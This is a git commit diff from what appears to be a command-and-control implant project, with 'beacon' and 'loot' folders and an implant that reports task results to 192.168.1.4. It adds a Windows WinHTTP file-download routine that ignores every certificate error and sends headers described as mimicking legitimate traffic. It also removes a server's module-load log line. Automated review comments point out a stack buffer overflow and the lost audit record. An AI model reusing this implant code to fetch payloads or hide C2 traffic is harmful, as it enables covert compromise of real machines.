John Doe
2025-05-22 19:39:47 +02:00
parent e297caa408
commit 912d8a6116
4 changed files with 144 additions and 147 deletions

1
.gitignore vendored

@@ -12,7 +12,6 @@ beacon/*.exe
beacon/scp.h
beaconC/obj
certificates
https
loot/
public
schannel

139
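--- a/https/download_schannel.c
+++ b/https/download_schannel.c
@@ -0,0 +1,139 @@
+// Function to download a file from a URL and save it to a local path
+BOOL DownloadFile(LPCWSTR url, LPCWSTR localPath) {
+HINTERNET hSession = NULL, hConnect = NULL, hRequest = NULL;
+BOOL bResults = FALSE;
+DWORD dwBytesRead = 0, dwBytesWritten = 0;
+HANDLE hFile = INVALID_HANDLE_VALUE;
+BYTE buffer[4096];
+// Parse URL to extract host and path
+URL_COMPONENTS urlComp = {0};
+urlComp.dwStructSize = sizeof(urlComp);
+urlComp.dwHostNameLength = -1;
+urlComp.dwUrlPathLength = -1;
+if (!WinHttpCrackUrl(url, 0, 0, &urlComp)) {
+wprintf(L"WinHttpCrackUrl failed (%lu)\n", GetLastError());
+return FALSE;
+}
+// Null-terminate host and path
+wchar_t host[256] = {0};
+wchar_t path[1024] = {0};
+wcsncpy(host, urlComp.lpszHostName, urlComp.dwHostNameLength);
+wcsncpy(path, urlComp.lpszUrlPath, urlComp.dwUrlPathLength);
+// Open session
+hSession = WinHttpOpen(USER_AGENT,
+WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
+WINHTTP_NO_PROXY_NAME,
+WINHTTP_NO_PROXY_BYPASS, 0);
+if (!hSession) {
+wprintf(L"WinHttpOpen failed (%lu)\n", GetLastError());
+goto cleanup;
+}
+// Connect
+hConnect = WinHttpConnect(hSession, host, urlComp.nPort, 0);
+if (!hConnect) {
+wprintf(L"WinHttpConnect failed (%lu)\n", GetLastError());
+goto cleanup;
+}
+// Create request
+hRequest = WinHttpOpenRequest(hConnect, L"GET", path,
+NULL, WINHTTP_NO_REFERER,
+WINHTTP_DEFAULT_ACCEPT_TYPES,
+(urlComp.nScheme == INTERNET_SCHEME_HTTPS) ? WINHTTP_FLAG_SECURE : 0);
+if (!hRequest) {
+wprintf(L"WinHttpOpenRequest failed (%lu)\n", GetLastError());
+goto cleanup;
+}
+// Ignore certificate errors for HTTPS
+if (urlComp.nScheme == INTERNET_SCHEME_HTTPS) {
+DWORD securityFlags = SECURITY_FLAG_IGNORE_UNKNOWN_CA |
+SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE |
+SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
+SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;
+if (!WinHttpSetOption(hRequest, WINHTTP_OPTION_SECURITY_FLAGS, &securityFlags, sizeof(securityFlags))) {
+wprintf(L"WinHttpSetOption failed (%lu)\n", GetLastError());
+goto cleanup;
+}
+}
+// Add headers
+if (!WinHttpAddRequestHeaders(hRequest, CUSTOM_HEADER, (DWORD)-1L, WINHTTP_ADDREQ_FLAG_ADD)) {
+wprintf(L"WinHttpAddRequestHeaders failed (%lu) for custom header\n", GetLastError());
+}
+for (int i = 0; i < NUM_COMMON_HEADERS; ++i) {
+if (!WinHttpAddRequestHeaders(hRequest, COMMON_HEADERS[i], (DWORD)-1L, WINHTTP_ADDREQ_FLAG_ADD)) {
+wprintf(L"WinHttpAddRequestHeaders failed (%lu) on common header %d\n", GetLastError(), i);
+}
+}
+// Send request
+bResults = WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0,
+WINHTTP_NO_REQUEST_DATA, 0, 0, 0);
+if (!bResults) {
+wprintf(L"WinHttpSendRequest failed (%lu)\n", GetLastError());
+goto cleanup;
+}
+// Receive response
+bResults = WinHttpReceiveResponse(hRequest, NULL);
+if (!bResults) {
+wprintf(L"WinHttpReceiveResponse failed (%lu)\n", GetLastError());
+goto cleanup;
+}
+// Check status code
+DWORD dwStatusCode = 0;
+DWORD dwSize = sizeof(dwStatusCode);
+if (!WinHttpQueryHeaders(hRequest, WINHTTP_QUERY_STATUS_CODE | WINHTTP_QUERY_FLAG_NUMBER,
+NULL, &dwStatusCode, &dwSize, NULL)) {
+wprintf(L"WinHttpQueryHeaders failed (%lu)\n", GetLastError());
+goto cleanup;
+}
+if (dwStatusCode != HTTP_STATUS_OK) {
+wprintf(L"HTTP request failed with status code %lu\n", dwStatusCode);
+goto cleanup;
+}
+// Create local file
+hFile = CreateFile(localPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
+if (hFile == INVALID_HANDLE_VALUE) {
+wprintf(L"CreateFile failed (%lu) for path %s\n", GetLastError(), localPath);
+goto cleanup;
+}
+// Read response body and write to file
+do {
+bResults = WinHttpReadData(hRequest, buffer, sizeof(buffer), &dwBytesRead);
+if (!bResults) {
+wprintf(L"WinHttpReadData failed (%lu)\n", GetLastError());
+goto cleanup;
+}
+if (dwBytesRead == 0) {
+break; // End of data
+}
+bResults = WriteFile(hFile, buffer, dwBytesRead, &dwBytesWritten, NULL);
+if (!bResults || dwBytesWritten != dwBytesRead) {
+wprintf(L"WriteFile failed (%lu)\n", GetLastError());
+goto cleanup;
+}
+} while (dwBytesRead > 0);
+wprintf(L"File downloaded successfully to %s\n", localPath);
+bResults = TRUE;
+cleanup:
+if (hFile != INVALID_HANDLE_VALUE) CloseHandle(hFile);
+if (hRequest) WinHttpCloseHandle(hRequest);
+if (hConnect) WinHttpCloseHandle(hConnect);
+if (hSession) WinHttpCloseHandle(hSession);
+return bResults;
+}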
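Review bot: The two `wcsncpy` calls copy `urlComp.dwHostNameLength` and `urlComp.dwUrlPathLength` characters into `host[256]` and `path[1024]` without comparing those lengths to the buffer sizes, so an over-long URL component writes past the stack arrays, and an exactly-full copy leaves them unterminated. Reject oversized components before copying, for example `if (urlComp.dwHostNameLength >= 256 || urlComp.dwUrlPathLength >= 1024) return FALSE;`. Separately, as far as this section shows, the new file opens directly with the function and carries no `#include` lines or declarations for `USER_AGENT`, `CUSTOM_HEADER`, `COMMON_HEADERS` and `NUM_COMMON_HEADERS`, so it probably does not build on its own. A one-line file comment saying whether this is a parked snippet or a compiled unit would help the next reader.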


@@ -6,10 +6,14 @@
#include <fcntl.h> // for _O_U16TEXT
// --- Configurable Variables ---
// User agent to identify implant against server
const wchar_t *USER_AGENT = L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";
// Custom header to identify against server
const wchar_t *CUSTOM_HEADER = L"Accept-Language: en-US,en;q=0.9\r\n";
// Common headers to mimic legit http traffic
const wchar_t *COMMON_HEADERS[] = {
L"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n",
L"Cache-Control: no-cache\r\n",
@@ -90,145 +94,6 @@ void CheckHeaderAndPrintCookie(const wchar_t *headers, const wchar_t *cookies) {
wprintf(L"\n[+] Target cookie found: %S\n", cookieValue);
}
// Function to download a file from a URL and save it to a local path
BOOL DownloadFile(LPCWSTR url, LPCWSTR localPath) {
HINTERNET hSession = NULL, hConnect = NULL, hRequest = NULL;
BOOL bResults = FALSE;
DWORD dwBytesRead = 0, dwBytesWritten = 0;
HANDLE hFile = INVALID_HANDLE_VALUE;
BYTE buffer[4096];
// Parse URL to extract host and path
URL_COMPONENTS urlComp = {0};
urlComp.dwStructSize = sizeof(urlComp);
urlComp.dwHostNameLength = -1;
urlComp.dwUrlPathLength = -1;
if (!WinHttpCrackUrl(url, 0, 0, &urlComp)) {
wprintf(L"WinHttpCrackUrl failed (%lu)\n", GetLastError());
return FALSE;
}
// Null-terminate host and path
wchar_t host[256] = {0};
wchar_t path[1024] = {0};
wcsncpy(host, urlComp.lpszHostName, urlComp.dwHostNameLength);
wcsncpy(path, urlComp.lpszUrlPath, urlComp.dwUrlPathLength);
// Open session
hSession = WinHttpOpen(USER_AGENT,
WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
WINHTTP_NO_PROXY_NAME,
WINHTTP_NO_PROXY_BYPASS, 0);
if (!hSession) {
wprintf(L"WinHttpOpen failed (%lu)\n", GetLastError());
goto cleanup;
}
// Connect
hConnect = WinHttpConnect(hSession, host, urlComp.nPort, 0);
if (!hConnect) {
wprintf(L"WinHttpConnect failed (%lu)\n", GetLastError());
goto cleanup;
}
// Create request
hRequest = WinHttpOpenRequest(hConnect, L"GET", path,
NULL, WINHTTP_NO_REFERER,
WINHTTP_DEFAULT_ACCEPT_TYPES,
(urlComp.nScheme == INTERNET_SCHEME_HTTPS) ? WINHTTP_FLAG_SECURE : 0);
if (!hRequest) {
wprintf(L"WinHttpOpenRequest failed (%lu)\n", GetLastError());
goto cleanup;
}
// Ignore certificate errors for HTTPS
if (urlComp.nScheme == INTERNET_SCHEME_HTTPS) {
DWORD securityFlags = SECURITY_FLAG_IGNORE_UNKNOWN_CA |
SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE |
SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;
if (!WinHttpSetOption(hRequest, WINHTTP_OPTION_SECURITY_FLAGS, &securityFlags, sizeof(securityFlags))) {
wprintf(L"WinHttpSetOption failed (%lu)\n", GetLastError());
goto cleanup;
}
}
// Add headers
if (!WinHttpAddRequestHeaders(hRequest, CUSTOM_HEADER, (DWORD)-1L, WINHTTP_ADDREQ_FLAG_ADD)) {
wprintf(L"WinHttpAddRequestHeaders failed (%lu) for custom header\n", GetLastError());
}
for (int i = 0; i < NUM_COMMON_HEADERS; ++i) {
if (!WinHttpAddRequestHeaders(hRequest, COMMON_HEADERS[i], (DWORD)-1L, WINHTTP_ADDREQ_FLAG_ADD)) {
wprintf(L"WinHttpAddRequestHeaders failed (%lu) on common header %d\n", GetLastError(), i);
}
}
// Send request
bResults = WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0,
WINHTTP_NO_REQUEST_DATA, 0, 0, 0);
if (!bResults) {
wprintf(L"WinHttpSendRequest failed (%lu)\n", GetLastError());
goto cleanup;
}
// Receive response
bResults = WinHttpReceiveResponse(hRequest, NULL);
if (!bResults) {
wprintf(L"WinHttpReceiveResponse failed (%lu)\n", GetLastError());
goto cleanup;
}
// Check status code
DWORD dwStatusCode = 0;
DWORD dwSize = sizeof(dwStatusCode);
if (!WinHttpQueryHeaders(hRequest, WINHTTP_QUERY_STATUS_CODE | WINHTTP_QUERY_FLAG_NUMBER,
NULL, &dwStatusCode, &dwSize, NULL)) {
wprintf(L"WinHttpQueryHeaders failed (%lu)\n", GetLastError());
goto cleanup;
}
if (dwStatusCode != HTTP_STATUS_OK) {
wprintf(L"HTTP request failed with status code %lu\n", dwStatusCode);
goto cleanup;
}
// Create local file
hFile = CreateFile(localPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
wprintf(L"CreateFile failed (%lu) for path %s\n", GetLastError(), localPath);
goto cleanup;
}
// Read response body and write to file
do {
bResults = WinHttpReadData(hRequest, buffer, sizeof(buffer), &dwBytesRead);
if (!bResults) {
wprintf(L"WinHttpReadData failed (%lu)\n", GetLastError());
goto cleanup;
}
if (dwBytesRead == 0) {
break; // End of data
}
bResults = WriteFile(hFile, buffer, dwBytesRead, &dwBytesWritten, NULL);
if (!bResults || dwBytesWritten != dwBytesRead) {
wprintf(L"WriteFile failed (%lu)\n", GetLastError());
goto cleanup;
}
} while (dwBytesRead > 0);
wprintf(L"File downloaded successfully to %s\n", localPath);
bResults = TRUE;
cleanup:
if (hFile != INVALID_HANDLE_VALUE) CloseHandle(hFile);
if (hRequest) WinHttpCloseHandle(hRequest);
if (hConnect) WinHttpCloseHandle(hConnect);
if (hSession) WinHttpCloseHandle(hSession);
return bResults;
}
// Function to perform the HTTPS request
void HttpRequest(LPCWSTR domain, INTERNET_PORT port, LPCWSTR method, LPCWSTR message) {
HINTERNET hSession = NULL, hConnect = NULL, hRequest = NULL;
@@ -391,11 +256,5 @@ int main() {
const wchar_t *message = L"SecretMessage123";
sendTaskResult(L"192.168.1.4", 443, message);
// Download a file (example)
wprintf(L"\nDownloading file:\n");
if (!DownloadFile(L"https://example.com/sample.txt", L"C:\\Downloads\\sample.txt")) {
wprintf(L"File download failed\n");
}
return 0;
}


@@ -72,7 +72,7 @@ func InitModules() error {
}
modules[fileName] = module
log.Printf("Loaded module: %s (%s)", fileName, path)
// log.Printf("Loaded module: %s (%s)", fileName, path)
return nil
})
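Review bot: The `log.Printf("Loaded module: %s (%s)", fileName, path)` call is commented out rather than removed, which leaves dead code in the closure and drops the load-time record of which module files were registered, at least as far as this hunk shows. If the message was too noisy, gate it behind a verbose or debug setting, or delete the line outright instead of keeping it as a comment. A record of what was loaded from disk is useful when auditing the server afterwards, so keeping it at a lower log level is the safer choice. The closure and `InitModules` both begin and end outside the hunk.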